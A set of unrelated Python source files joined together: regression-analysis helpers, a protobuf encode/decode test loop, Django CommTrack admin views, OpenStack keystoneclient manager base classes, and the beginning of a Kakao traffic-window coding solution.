    Prints the standard error of estimate, R^2 / adjusted R^2 with an
    over-fitting heuristic (|R^2 - Ra^2| >= 0.06), and the ANOVA F test.
    """
    y_data = df[yname]
    # assemble the design matrix column by column, preserving xnames order
    x_data_ar = []
    for i in range(len(xnames)):
        x_data_ar.append(df[xnames[i]])
    x_data_ar = np.asarray(x_data_ar)
    x_data_T = x_data_ar.T
    x_data = pd.DataFrame(x_data_T, columns = xnames)
    x_data2 = sm.add_constant(x_data)
    olsmod = sm.OLS(y_data, x_data2)
    result = olsmod.fit()
    print("\n\n---------------------------\n| Model Assessing |\n---------------------------\n")
    print("using alpha = ", alpha)
    print("\n\n ◆ Standard Error of Estimate\n")
    s2_e = result.mse_resid
    print(f"MSE = {s2_e:f}")
    s_e = result.mse_resid ** 0.5
    print("Standard error = ", s_e)
    y_bar = df[yname].mean()
    print("y mean = ", y_bar)
    print("y STD = ", df[yname].std())
    print(f"The absolute value of standard errors is about {abs(s_e/y_bar)*100:.0f}% of mean of independent variables.\n")
    R2 = result.rsquared
    print("\nCoefficient of Determination")
    print("R^2 = ", result.rsquared)
    print("Adjusted R^2 = ", result.rsquared_adj)
    print(f"\nR^2 value interpretation\nAbout {R2*100:.0f}% of the variation in the dependent variables is explained by the model, the rest remains unexplained.")
    rvInter(R2**0.5)
    print("\n\n ◆ Over-fitting?\n")
    diffrra = abs(result.rsquared - result.rsquared_adj)
    print("|R^2 - Ra^2| = ", diffrra)
    if(diffrra > 0.06):
        print("|R^2 - Ra^2| >= 0.06 indicating that the model has the problem of over-fitting.")
    else:
        print("|R^2 - Ra^2| < 0.06 indicating that the model doesn't have the problem of over-fitting.")
    print("\n\n ◆ F-test of ANOVA\n")
    print("Testing hypothesis,")
    # Raw strings: the originals were plain strings, so "\b" and "\t" were
    # interpreted as backspace/tab instead of LaTeX \beta and \text.
    print(r"H_0: \beta_1 = \beta_2 = \dots = \beta_n = 0<br>")
    print(r"H_1: \text{at least one } \beta_i \neq 0")
    # Reconstruct the ANOVA table from the F statistic and MSE
    f_res = result.fvalue
    MSE = result.mse_resid
    df_model = result.df_model
    df_error = result.df_resid
    MSR = f_res * MSE
    SSR = MSR * df_model
    print("SSR = ", SSR, "\tdf = ", df_model, "\tMSR = ", MSR)
    print("SSE = ", MSE * df_error, "\tdf = ", df_error, "\tMSE = ", MSE)
    print("F = MSR / MSE = ", MSR / MSE)
    fpv = result.f_pvalue
    print("F p-value = ", fpv)
    pvSig(fpv)
def multiple_CIPIPRE_ (xdata, yval, x1, alpha = 0.05):
    """Print the CI for the mean response and the PI for an individual
    response at design row x1, for a multiple regression.

    xdata: predictors as a (k, n) array (rows = variables).
    yval: response values. x1: design row including the leading 1.
    """
    print("\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n|CI PI for simple regression|\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n")
    print("using alpha = ", alpha)
    print("To make Confidence Interval and Prediction Interval prediction at mean of x = ", x1)
    x_data_T = xdata.T
    x_data2 = sm.add_constant(x_data_T)
    olsmod = sm.OLS(yval, x_data2)
    result_reg = olsmod.fit()
    y_head = np.dot(result_reg.params, x1)
    print("y_head = ", y_head)
    # Pass the confidence level positionally: the keyword was renamed from
    # `alpha` to `confidence` in SciPy 1.9 and the old name later removed,
    # so `alpha=` breaks on current SciPy.
    (t_minus, t_plus) = stats.t.interval(1.0 - alpha, df = result_reg.df_resid )
    # s.e. of the mean response: sqrt(MSE * x1' (X'X)^-1 x1)
    core1 = (result_reg.mse_resid * np.matmul(x1, np.linalg.solve(np.matmul(x_data2.T, x_data2), x1))) ** 0.5
    lower_bound = y_head + t_minus * core1
    upper_bound = y_head + t_plus * core1
    # prediction adds the extra "1" for the individual error
    core2 = (result_reg.mse_resid * (1 + np.matmul(x1, np.linalg.solve(np.matmul(x_data2.T, x_data2), x1)))) ** 0.5
    lower_bound2 = y_head + t_minus * core2
    upper_bound2 = y_head + t_plus * core2
    print(f"\n{100*(1-alpha):.0f}% confidence interval for mean: [{lower_bound:.4f}, {upper_bound:.4f}]")
    print(f"\n{100*(1-alpha):.0f}% prediction interval: [{lower_bound2:.4f}, {upper_bound2:.4f}]")
def multiple_CIPIPRE (df, xnames, yname, xx, alpha = 0.05):
    """Build the design row [1, *xx] and the predictor matrix from df,
    then delegate interval printing to multiple_CIPIPRE_."""
    design_row = np.array([1] + xx)
    predictors = np.asarray([df[name] for name in xnames])
    multiple_CIPIPRE_ (predictors, df[yname], design_row, alpha)
def multiple(step, df, xnames, yname, alpha = 0.05, tail = 'db', nobins = 6):
    """Run one numbered step of the multiple-regression workflow (1-8).

    Unknown step values print an error message. `tail` is accepted for
    symmetry with simple() but is not used by any multiple_* step.
    """
    if step == 1:
        multiple_regplot(df, xnames, yname)
    elif step == 2:
        multiple_modpropose(xnames, yname)
    elif step == 3:
        multiple_regmod(df, xnames, yname)
    elif step == 4:
        print("\nfor autocorrelation and others, please determine by yourself!\n")
        multiple_durbin_watson(df, xnames, yname, alpha = alpha)
    elif step == 5:
        print("\nremember to remove outliers or do some modifications.\n")
        multiple_residual(df, xnames, yname, alpha = alpha, nobins = nobins)
    elif step == 6:
        multiple_modass(df, xnames, yname, alpha = alpha)
    elif step == 7:
        print("\ninterpretation\n")
    elif step == 8:
        # Fixed escape bug: the original string began with "\m" (a literal
        # backslash-m); "\n" newline was clearly intended, matching simple().
        print("\nmultiple_CIPIPRE (df, xnames, yname, xx...) won't run here\n")
    else:
        print("\nbad input for step!\n")
def time_add(df, name = 'Time'):
    """Append a 0-based time-index column to df (mutated in place) and
    return the same DataFrame. The index list is printed, as before."""
    time_index = list(range(df.shape[0]))
    print(time_index)
    df[name] = time_index
    return df
def value_map_ln(df, target):
    """Add a column 'ln_<target>' holding the natural log of each value in
    the target column (mutates df) and return the same DataFrame."""
    df["ln_" + target] = [math.log(value) for value in df[target].values]
    return df
def outliers_rm(df, out):
    """Return a copy of df with the rows at positions `out` dropped and
    the index renumbered.

    NOTE(review): reset_index() is called without drop=True, so the old
    index survives as a new 'index' column — presumably to keep original
    row ids; confirm callers rely on that before changing it.
    """
    trimmed = df.drop(df.index[out]).reset_index()
    return trimmed
|
import time
import sgeProto
# Sample payload for the 'Person' message defined in example.proto.
# NOTE(review): values look like placeholder test data.
data = {
    'name': 'username1',
    'id': [13245, 1,2,34,5],
    'email': '1111112',
    'phone': [
        { 'num': '1234', 'type': -1 },
        { 'num': '4321', 'type': -2 }
    ]
}
# Load the schema, then dump parser state (exact behavior of debug() is
# defined by the sgeProto extension — confirm in its docs).
sgeProto.parseFile("../example.proto")
sgeProto.debug()
# Round-trip stress loop: encode -> pack -> unpack -> decode, printing the
# decoded result each time.
# NOTE(review): 10,000,000 iterations with a 2-second sleep each would take
# months — presumably meant as "loop until interrupted".
for i in range(10000000):
    code = sgeProto.encode('Person', data)
    pack_code = sgeProto.pack(code)
    unpack_code = sgeProto.unpack(pack_code)
    result = sgeProto.decode(unpack_code)
    print(result)
    time.sleep(2)
|
import copy
import decimal
import json
from django.contrib import messages
from django.core.exceptions import ValidationError
from django.db.utils import DataError
from django.http import Http404, HttpResponseBadRequest, HttpResponseRedirect
from django.urls import reverse
from django.utils.decorators import method_decorator
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_noop
from memoized import memoized
from casexml.apps.stock.models import StockTransaction
from corehq import toggles
from corehq.apps.commtrack.const import SUPPLY_POINT_CASE_TYPE
from corehq.apps.commtrack.processing import (
plan_rebuild_stock_state,
rebuild_stock_state,
)
from corehq.apps.domain.decorators import domain_admin_required
from corehq.apps.domain.views.base import BaseDomainView
from corehq.apps.hqwebapp.decorators import use_jquery_ui
from corehq.apps.hqwebapp.doc_info import get_doc_info_by_id
from corehq.apps.locations.models import LocationType, SQLLocation
from corehq.form_processor.exceptions import XFormNotFound
from corehq.form_processor.interfaces.dbaccessors import FormAccessors
from corehq.util.timezones.conversions import ServerTime
from .forms import CommTrackSettingsForm, ConsumptionForm
from .models import SQLActionConfig, SQLStockRestoreConfig
from .tasks import recalculate_domain_consumption_task
from .util import all_sms_codes
@domain_admin_required
def default(request, domain):
    """Redirect to the CommTrack landing page; 404 unless the project has
    commtrack enabled."""
    project = request.project
    if not project or not project.commtrack_enabled:
        raise Http404()
    return HttpResponseRedirect(default_commtrack_url(domain))
def default_commtrack_url(domain):
    """Return the URL of the product list view, the default CommTrack page
    for a domain. Imported locally to avoid a circular import."""
    from corehq.apps.products.views import ProductListView
    urlname = ProductListView.urlname
    return reverse(urlname, args=[domain])
class BaseCommTrackManageView(BaseDomainView):
    """Base view for CommTrack setup pages.

    Requires a domain admin (see dispatch) and an existing
    commtrack_settings object on the domain; GET 404s otherwise.
    """
    section_name = ugettext_noop("Setup")

    @property
    def section_url(self):
        # Section/breadcrumb link shared by all setup pages.
        return reverse('default_commtrack_setup', args=[self.domain])

    def get(self, *args, **kwargs):
        # Domains that never enabled commtrack have no settings object.
        if self.domain_object.commtrack_settings is None:
            raise Http404()
        return super(BaseCommTrackManageView, self).get(*args, **kwargs)

    @method_decorator(domain_admin_required)  # TODO: will probably want less restrictive permission?
    def dispatch(self, request, *args, **kwargs):
        return super(BaseCommTrackManageView, self).dispatch(request, *args, **kwargs)
class CommTrackSettingsView(BaseCommTrackManageView):
urlname = 'commtrack_settings'
page_title = ugettext_noop("Advanced Settings")
template_name = 'domain/admin/commtrack_settings.html'
    @property
    @memoized
    def commtrack_settings(self):
        # Cached shortcut to the domain's commtrack settings model.
        return self.domain_object.commtrack_settings
    @property
    def page_context(self):
        """Template context: just the advanced-settings form."""
        return {
            'form': self.commtrack_settings_form
        }
    @property
    @memoized
    def commtrack_settings_form(self):
        """Build the settings form, flattening the related consumption and
        stock-levels config rows into 'consumption_*' / 'stock_*' prefixed
        initial values."""
        initial = self.commtrack_settings.to_json()
        if hasattr(self.commtrack_settings, 'sqlconsumptionconfig'):
            initial.update(dict(('consumption_' + k, v) for k, v in
                self.commtrack_settings.sqlconsumptionconfig.to_json().items()))
        if hasattr(self.commtrack_settings, 'sqlstocklevelsconfig'):
            initial.update(dict(('stock_' + k, v) for k, v in
                self.commtrack_settings.sqlstocklevelsconfig.to_json().items()))
        if self.request.method == 'POST':
            # Bind POST data so validation errors re-render with user input.
            return CommTrackSettingsForm(self.request.POST, initial=initial, domain=self.domain)
        return CommTrackSettingsForm(initial=initial, domain=self.domain)
    def set_ota_restore_config(self):
        """
        If the checkbox for syncing consumption fixtures is
        checked, then we build the restore config with appropriate
        special properties, otherwise just clear the object.

        If there becomes a way to tweak these on the UI, this should
        be done differently.
        """
        if self.commtrack_settings.sync_consumption_fixtures:
            self.domain_object.commtrack_settings.sqlstockrestoreconfig = SQLStockRestoreConfig(
                # expose 'stock' sections as consumption values in the restore
                section_to_consumption_types={
                    'stock': 'consumption'
                },
                force_consumption_case_types=[
                    SUPPLY_POINT_CASE_TYPE
                ],
                use_dynamic_product_list=True,
            )
        else:
            # a fresh, empty config means the feature is off
            self.domain_object.commtrack_settings.sqlstockrestoreconfig = SQLStockRestoreConfig()
def post(self, request, *args, **kwargs):
if self.commtrack_settings_form.is_valid():
data = self.commtrack_settings_form.cleaned_data
previous_json = copy.copy(self.commtrack_settings.to_json())
for attr in ('use_auto_consumption', 'sync_consumption_fixtures', 'individual_consumption_defaults'):
setattr(self.commtrack_settings, attr, bool(data.get(attr)))
self.set_ota_restore_config()
fields = ('emergency_level', 'understock_threshold', 'overstock_threshold')
for field in fields:
if data.get('stock_' + field):
setattr(self.commtrack_settings.sqlstocklevelsconfig, field,
data['stock_' + field])
consumption_fields = ('min_transactions', 'min_window', 'optimal_window')
for field in consumption_fields:
if data.get('consumption_' + field):
setattr(self.commtrack_settings.sqlconsumptionconfig, field,
data['consumption_' + field])
try:
self.commtrack_settings.save()
for attr in ('sqlconsumptionconfig', 'sqlstockrestoreconfig', 'sqlstocklevelsconfig'):
submodel = getattr(self.commtrack_settings, attr)
submodel.commtrack_settings = self.commtrack_settings
submodel.save()
except (decimal.InvalidOperation, DataError): # capture only decimal errors and integer overflows
try:
# Get human-readable messages
self.commtrack_settings.sqlstocklevelsconfig.full_clean()
self.commtrack_settings.sqlconsumptionconfig.full_clean()
except ValidationError as e:
for key, msgs in dict(e).items():
for msg in msgs:
messages.error(request, _("Could not save {}: {}").format(key, msg))
for loc_type in LocationType.objects.filter(domain=self.domain).all():
# This will update stock levels based on commtrack config
loc_type.save()
same_flag = previous_json['use_auto_consumption'] == self.commtrack_settings.use_auto_consumption
same_config = (
previous_json['consumption_config'] == self.commtrack_settings.sqlconsumptionconfig.to_json()
)
if (not same_flag or not same_config):
# kick off delayed consumption rebuild
recalculate_domain_consumption_task.delay(self.domain)
messages.success(request, _("Settings updated! Your updated consumption settings may take a "
"few minutes to show up in reports and on phones."))
else:
messages.success(request, _("Settings updated!"))
return HttpResponseRedirect(self.page_url)
return self.get(request, *args, **kwargs)
class DefaultConsumptionView(BaseCommTrackManageView):
    """Admin view for editing a domain's default consumption values."""

    urlname = 'update_default_consumption'
    template_name = 'commtrack/manage/default_consumption.html'
    page_title = ugettext_noop("Consumption")

    @property
    @memoized
    def consumption_form(self):
        # Bound form on POST, unbound otherwise.
        form_args = [self.domain]
        if self.request.method == 'POST':
            form_args.append(self.request.POST)
        return ConsumptionForm(*form_args)

    @property
    def page_context(self):
        return {
            'form': self.consumption_form,
        }

    def post(self, request, *args, **kwargs):
        form = self.consumption_form
        if not form.is_valid():
            # Re-render with validation errors.
            return self.get(request, *args, **kwargs)
        form.save()
        messages.success(request, _("Default consumption values updated"))
        return HttpResponseRedirect(
            reverse(DefaultConsumptionView.urlname, args=[self.domain])
        )
class SMSSettingsView(BaseCommTrackManageView):
    """Admin view for configuring CommTrack SMS action keywords."""

    urlname = 'commtrack_sms_settings'
    page_title = ugettext_noop("SMS")
    template_name = 'domain/admin/sms_settings.html'

    @property
    def page_context(self):
        return {
            'other_sms_codes': dict(self.get_other_sms_codes()),
            'settings': self.settings_context,
        }

    @property
    def settings_context(self):
        return {
            'actions': [self._get_action_info(a) for a in self.domain_object.commtrack_settings.all_actions],
        }

    # FIXME
    def _get_action_info(self, action):
        # Serialized shape consumed by the settings page; note 'name'
        # carries the subaction and must be round-tripped by post() below.
        return {
            'type': action.action,
            'keyword': action.keyword,
            'name': action.subaction,
            'caption': action.caption,
        }

    def get_other_sms_codes(self):
        """Yield ``(code, ('product', product name))`` for product SMS codes."""
        for k, v in all_sms_codes(self.domain).items():
            if v[0] == 'product':
                yield (k, (v[0], v[1].name))

    def post(self, request, *args, **kwargs):
        payload = json.loads(request.POST.get('json'))

        def make_action(action):
            # Inverse of _get_action_info: 'name' maps back to subaction.
            # (Previously this read action['caption'], which silently
            # overwrote the subaction with the caption on every save.)
            return SQLActionConfig(**{
                'action': action['type'],
                'subaction': action['name'],
                'keyword': action['keyword'],
                'caption': action['caption'],
            })

        # TODO add server-side input validation here (currently validated on client)
        self.domain_object.commtrack_settings.set_actions([make_action(a) for a in payload['actions']])
        self.domain_object.commtrack_settings.save()

        return self.get(request, *args, **kwargs)

    @use_jquery_ui
    def dispatch(self, request, *args, **kwargs):
        return super(SMSSettingsView, self).dispatch(request, *args, **kwargs)
class RebuildStockStateView(BaseCommTrackManageView):
    """Debug/admin view for inspecting and rebuilding ledger stock state.

    GET renders the rebuild plan (the actions that would be replayed) for
    each (case, section, product) combination matching the query filters;
    POST rebuilds the stock state for one combination.
    """
    urlname = 'rebuild_stock_state'
    page_title = ugettext_noop("Rebuild Stock State")
    template_name = 'commtrack/manage/rebuild_stock_state.html'

    @memoized
    def get_server_date_by_form_id(self, form_id):
        # Return the form's received-on time as a UI string, or None if the
        # form no longer exists.
        try:
            server_date = FormAccessors(self.domain).get_form(form_id).received_on
        except XFormNotFound:
            return None
        else:
            return ServerTime(server_date).ui_string()

    def _get_selected_case_id(self):
        # Map the optional ?location_id= query param to that location's
        # supply point case id; returns None (with an error message) on miss.
        location_id = self.request.GET.get('location_id')
        if location_id:
            try:
                return (SQLLocation.objects
                        .get(domain=self.domain, location_id=location_id)
                        .supply_point_id)
            except SQLLocation.DoesNotExist:
                messages.error(self.request, 'Your location id did not match a location')

    @property
    def page_context(self, **kwargs):
        # Limits keep this debug page from loading unbounded amounts of data;
        # both are overridable via query parameters.
        stock_state_limit = int(self.request.GET.get('stock_state_limit', 100))
        stock_transaction_limit = int(self.request.GET.get('stock_transaction_limit', 1000))
        stock_state_limit_exceeded = False
        stock_transaction_limit_exceeded = False

        query = StockTransaction.objects.filter(report__domain=self.domain)
        selected_case_id = self._get_selected_case_id()
        if selected_case_id:
            query = query.filter(case_id=selected_case_id)
        selected_product_id = self.request.GET.get('product_id')
        if selected_product_id:
            query = query.filter(product_id=selected_product_id)
        # Each distinct (case, section, product) triple identifies one
        # stock state to plan a rebuild for.
        stock_state_keys = [
            (txn.case_id, txn.section_id, txn.product_id)
            for txn in query
                .order_by('case_id', 'section_id', 'product_id')
                .distinct('case_id', 'section_id', 'product_id')
                [:stock_state_limit]
        ]
        if len(stock_state_keys) >= stock_state_limit:
            stock_state_limit_exceeded = True

        actions_by_stock_state_key = []
        stock_transaction_count = 0
        for stock_state_key in stock_state_keys:
            actions = self.get_actions_by_stock_state_key(*stock_state_key)
            stock_transaction_count += len(actions[1])
            # Stop collecting once the cumulative transaction budget is spent.
            if stock_transaction_count > stock_transaction_limit:
                stock_transaction_limit_exceeded = True
                break
            actions_by_stock_state_key.append(actions)
        # distinct() above should guarantee uniqueness of the key triples.
        assert len(set(stock_state_keys)) == len(stock_state_keys)
        return {
            'actions_by_stock_state_key': actions_by_stock_state_key,
            'stock_state_limit_exceeded': stock_state_limit_exceeded,
            'stock_state_limit': stock_state_limit,
            'stock_transaction_limit_exceeded': stock_transaction_limit_exceeded,
            'stock_transaction_limit': stock_transaction_limit,
        }

    def get_actions_by_stock_state_key(self, case_id, section_id, product_id):
        # Return (key dict, [(action class name, action, server date), ...],
        # case doc info) for one stock state.
        actions = [
            (
                action.__class__.__name__,
                action,
                self.get_server_date_by_form_id(
                    action.stock_transaction.report.form_id),
            ) for action in
            plan_rebuild_stock_state(case_id, section_id, product_id)
        ]
        return (
            {'case_id': case_id,
             'section_id': section_id,
             'product_id': product_id},
            actions,
            get_doc_info_by_id(self.domain, case_id)
        )

    def post(self, request, *args, **kwargs):
        # All three key components are required to rebuild a stock state.
        case_id = request.POST.get('case_id')
        section_id = request.POST.get('section_id')
        product_id = request.POST.get('product_id')
        if None in (case_id, section_id, product_id):
            return HttpResponseBadRequest()
        rebuild_stock_state(case_id, section_id, product_id)
        return HttpResponseRedirect('.')
|
# Copyright 2010 Jacob Kaplan-Moss
# Copyright 2011 OpenStack Foundation
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Base utilities to build API operation managers and objects on top of.
"""
import abc
import functools
import six
from six.moves import urllib
from keystoneclient import auth
from keystoneclient import exceptions
from keystoneclient.i18n import _
from keystoneclient.openstack.common.apiclient import base
def getid(obj):
    """Return the ID of *obj* if it is a Resource, else *obj* itself.

    Abstracts the common pattern of allowing both an object or an object's ID
    (UUID) as a parameter when dealing with relationships.
    """
    # Prefer a truthy uuid attribute; fall back to id; finally the object.
    uuid = getattr(obj, 'uuid', None)
    if uuid:
        return uuid
    return getattr(obj, 'id', obj)
def filter_none(**kwargs):
    """Remove any entries from a dictionary where the value is None."""
    # dict.items() behaves correctly on both Python 2 and 3, so there is
    # no need to route through six.iteritems here.
    return dict((k, v) for k, v in kwargs.items() if v is not None)
def filter_kwargs(f):
    """Decorator that drops None-valued kwargs and flattens resource args.

    Keyword arguments whose value is None are removed.  If ``getid``
    extracts an ID different from the value itself (i.e. a Resource-like
    object was passed), the argument is renamed ``<key>_id`` and replaced
    by the extracted ID.
    """
    @functools.wraps(f)
    def func(*args, **kwargs):
        new_kwargs = {}
        # dict.items() works on Python 2 and 3; six is unnecessary here.
        for key, ref in kwargs.items():
            if ref is None:
                # drop null values
                continue

            id_value = getid(ref)
            if id_value != ref:
                # If an object with an id was passed, then use the id, e.g.:
                # user: user(id=1) becomes user_id: 1
                key = '%s_id' % key
            new_kwargs[key] = id_value
        return f(*args, **new_kwargs)
    return func
class Manager(object):
    """Basic manager type providing common operations.

    Managers interact with a particular type of API (servers, flavors, images,
    etc.) and provide CRUD operations for them.

    :param client: instance of BaseClient descendant for HTTP requests
    """

    # Class used to wrap response payloads; set by concrete subclasses.
    resource_class = None

    def __init__(self, client):
        super(Manager, self).__init__()
        self.client = client

    @property
    def api(self):
        """Deprecated. Use `client` instead.
        """
        return self.client

    def _list(self, url, response_key, obj_class=None, body=None, **kwargs):
        """List the collection.

        :param url: a partial URL, e.g., '/servers'
        :param response_key: the key to be looked up in response dictionary,
            e.g., 'servers'
        :param obj_class: class for constructing the returned objects
            (self.resource_class will be used by default)
        :param body: data that will be encoded as JSON and passed in POST
            request (GET will be sent by default)
        :param kwargs: Additional arguments will be passed to the request.
        """
        # A body switches the request from GET to POST.
        if body:
            resp, body = self.client.post(url, body=body, **kwargs)
        else:
            resp, body = self.client.get(url, **kwargs)

        if obj_class is None:
            obj_class = self.resource_class

        data = body[response_key]
        # NOTE(ja): keystone returns values as list as {'values': [ ... ]}
        #           unlike other services which just return the list...
        try:
            data = data['values']
        except (KeyError, TypeError):
            pass

        # Skip falsy entries so partial/empty rows don't become resources.
        return [obj_class(self, res, loaded=True) for res in data if res]

    def _get(self, url, response_key, **kwargs):
        """Get an object from collection.

        :param url: a partial URL, e.g., '/servers'
        :param response_key: the key to be looked up in response dictionary,
            e.g., 'server'
        :param kwargs: Additional arguments will be passed to the request.
        """
        resp, body = self.client.get(url, **kwargs)
        return self.resource_class(self, body[response_key], loaded=True)

    def _head(self, url, **kwargs):
        """Retrieve request headers for an object.

        :param url: a partial URL, e.g., '/servers'
        :param kwargs: Additional arguments will be passed to the request.
        :returns: True when the server responded 204 (No Content).
        """
        resp, body = self.client.head(url, **kwargs)
        return resp.status_code == 204

    def _create(self, url, body, response_key, return_raw=False, **kwargs):
        """Deprecated. Use `_post` instead.
        """
        return self._post(url, body, response_key, return_raw, **kwargs)

    def _post(self, url, body, response_key, return_raw=False, **kwargs):
        """Create an object.

        :param url: a partial URL, e.g., '/servers'
        :param body: data that will be encoded as JSON and passed in POST
            request (GET will be sent by default)
        :param response_key: the key to be looked up in response dictionary,
            e.g., 'servers'
        :param return_raw: flag to force returning raw JSON instead of
            Python object of self.resource_class
        :param kwargs: Additional arguments will be passed to the request.
        """
        resp, body = self.client.post(url, body=body, **kwargs)
        if return_raw:
            return body[response_key]
        return self.resource_class(self, body[response_key])

    def _put(self, url, body=None, response_key=None, **kwargs):
        """Update an object with PUT method.

        :param url: a partial URL, e.g., '/servers'
        :param body: data that will be encoded as JSON and passed in POST
            request (GET will be sent by default)
        :param response_key: the key to be looked up in response dictionary,
            e.g., 'servers'
        :param kwargs: Additional arguments will be passed to the request.
        """
        resp, body = self.client.put(url, body=body, **kwargs)
        # PUT requests may not return a body
        if body is not None:
            if response_key is not None:
                return self.resource_class(self, body[response_key])
            else:
                return self.resource_class(self, body)

    def _patch(self, url, body=None, response_key=None, **kwargs):
        """Update an object with PATCH method.

        :param url: a partial URL, e.g., '/servers'
        :param body: data that will be encoded as JSON and passed in POST
            request (GET will be sent by default)
        :param response_key: the key to be looked up in response dictionary,
            e.g., 'servers'
        :param kwargs: Additional arguments will be passed to the request.
        """
        resp, body = self.client.patch(url, body=body, **kwargs)
        if response_key is not None:
            return self.resource_class(self, body[response_key])
        else:
            return self.resource_class(self, body)

    def _delete(self, url, **kwargs):
        """Delete an object.

        :param url: a partial URL, e.g., '/servers/my-server'
        :param kwargs: Additional arguments will be passed to the request.
        """
        return self.client.delete(url, **kwargs)

    def _update(self, url, body=None, response_key=None, method="PUT",
                **kwargs):
        """Update an object with the given HTTP method (PUT/POST/PATCH).

        :raises exceptions.ClientException: when *method* is not one of the
            three supported verbs.
        """
        methods = {"PUT": self.client.put,
                   "POST": self.client.post,
                   "PATCH": self.client.patch}
        try:
            resp, body = methods[method](url, body=body,
                                         **kwargs)
        except KeyError:
            raise exceptions.ClientException(_("Invalid update method: %s")
                                             % method)
        # PUT requests may not return a body
        if body:
            return self.resource_class(self, body[response_key])
@six.add_metaclass(abc.ABCMeta)
class ManagerWithFind(Manager):
    """Manager with additional `find()`/`findall()` methods."""

    @abc.abstractmethod
    def list(self):
        pass

    def find(self, **kwargs):
        """Find a single item with attributes matching ``**kwargs``.

        This isn't very efficient: it loads the entire list then filters on
        the Python side.
        """
        matches = self.findall(**kwargs)
        if not matches:
            msg = _("No %(name)s matching %(kwargs)s.") % {
                'name': self.resource_class.__name__, 'kwargs': kwargs}
            raise exceptions.NotFound(404, msg)
        if len(matches) > 1:
            raise exceptions.NoUniqueMatch
        return matches[0]

    def findall(self, **kwargs):
        """Find all items with attributes matching ``**kwargs``.

        This isn't very efficient: it loads the entire list then filters on
        the Python side.
        """
        matches = []
        criteria = list(kwargs.items())
        for candidate in self.list():
            try:
                # Candidates lacking any requested attribute are skipped.
                is_match = all(getattr(candidate, name) == wanted
                               for (name, wanted) in criteria)
            except AttributeError:
                continue
            if is_match:
                matches.append(candidate)
        return matches
class CrudManager(Manager):
    """Base manager class for manipulating Keystone entities.

    Children of this class are expected to define a `collection_key` and `key`.

    - `collection_key`: Usually a plural noun by convention (e.g. `entities`);
      used to refer collections in both URL's (e.g.  `/v3/entities`) and JSON
      objects containing a list of member resources (e.g. `{'entities': [{},
      {}, {}]}`).
    - `key`: Usually a singular noun by convention (e.g. `entity`); used to
      refer to an individual member of the collection.
    """
    collection_key = None
    key = None
    # Optional prefix prepended to every generated URL.
    base_url = None

    def build_url(self, dict_args_in_out=None):
        """Builds a resource URL for the given kwargs.

        Given an example collection where `collection_key = 'entities'` and
        `key = 'entity'`, the following URL's could be generated.

        By default, the URL will represent a collection of entities, e.g.::

            /entities

        If kwargs contains an `entity_id`, then the URL will represent a
        specific member, e.g.::

            /entities/{entity_id}

        If a `base_url` is provided, the generated URL will be appended to it.

        NOTE: consumed keys ('base_url', '<key>_id') are popped from
        *dict_args_in_out*, mutating the caller's dict.
        """
        if dict_args_in_out is None:
            dict_args_in_out = {}

        url = dict_args_in_out.pop('base_url', None) or self.base_url or ''
        url += '/%s' % self.collection_key

        # do we have a specific entity?
        entity_id = dict_args_in_out.pop('%s_id' % self.key, None)
        if entity_id is not None:
            url += '/%s' % entity_id

        return url

    @filter_kwargs
    def create(self, **kwargs):
        # Remaining kwargs (after URL components are popped) form the body.
        url = self.build_url(dict_args_in_out=kwargs)
        return self._create(
            url,
            {self.key: kwargs},
            self.key)

    @filter_kwargs
    def get(self, **kwargs):
        return self._get(
            self.build_url(dict_args_in_out=kwargs),
            self.key)

    @filter_kwargs
    def head(self, **kwargs):
        return self._head(self.build_url(dict_args_in_out=kwargs))

    def _build_query(self, params):
        # Empty string when there is nothing to encode.
        return '?%s' % urllib.parse.urlencode(params) if params else ''

    @filter_kwargs
    def list(self, fallback_to_auth=False, **kwargs):
        """List members; kwargs left after URL building become query params.

        With *fallback_to_auth*, an EmptyCatalog error is retried against
        the authentication endpoint instead of being raised.
        """
        url = self.build_url(dict_args_in_out=kwargs)

        try:
            query = self._build_query(kwargs)
            url_query = '%(url)s%(query)s' % {'url': url, 'query': query}
            return self._list(
                url_query,
                self.collection_key)
        except exceptions.EmptyCatalog:
            if fallback_to_auth:
                return self._list(
                    url_query,
                    self.collection_key,
                    endpoint_filter={'interface': auth.AUTH_INTERFACE})
            else:
                raise

    @filter_kwargs
    def put(self, **kwargs):
        return self._update(
            self.build_url(dict_args_in_out=kwargs),
            method='PUT')

    @filter_kwargs
    def update(self, **kwargs):
        # Keys consumed for the URL are popped first; the rest is the body.
        url = self.build_url(dict_args_in_out=kwargs)

        return self._update(
            url,
            {self.key: kwargs},
            self.key,
            method='PATCH')

    @filter_kwargs
    def delete(self, **kwargs):
        return self._delete(
            self.build_url(dict_args_in_out=kwargs))

    @filter_kwargs
    def find(self, **kwargs):
        """Find a single item with attributes matching ``**kwargs``."""
        url = self.build_url(dict_args_in_out=kwargs)

        # Unlike ManagerWithFind, filtering happens server-side via query.
        query = self._build_query(kwargs)
        rl = self._list(
            '%(url)s%(query)s' % {
                'url': url,
                'query': query,
            },
            self.collection_key)
        num = len(rl)

        if num == 0:
            msg = _("No %(name)s matching %(kwargs)s.") % {
                'name': self.resource_class.__name__, 'kwargs': kwargs}
            raise exceptions.NotFound(404, msg)
        elif num > 1:
            raise exceptions.NoUniqueMatch
        else:
            return rl[0]
class Resource(base.Resource):
    """Base class for OpenStack resources (tenant, user, etc.).

    This is pretty much just a bag for attributes.
    """

    def delete(self):
        # Delegate to the manager, which knows how to build the URL
        # for this specific resource.
        return self.manager.delete(self)
|
# [Kakao] Chuseok Traffic (2018 blind recruitment problem)
"""
If (the next request's start time - 1000ms) is at or before the current
request's end time, the two requests share a 1-second window: count +1.
"""
def solution(lines):
    """Return the maximum number of requests handled in any 1-second window.

    Each log line is '<date> <hh:mm:ss.mmm end time> <duration>s'.  For every
    request we open a window at its end time; any later request whose start
    time falls within 999ms after that end time overlaps the window.
    """
    starts = []
    ends = []
    for line in lines:
        _, finished_at, duration = line.split(" ")
        starts.append(get_start_time(finished_at, duration))
        ends.append(get_time(finished_at))

    best = 0
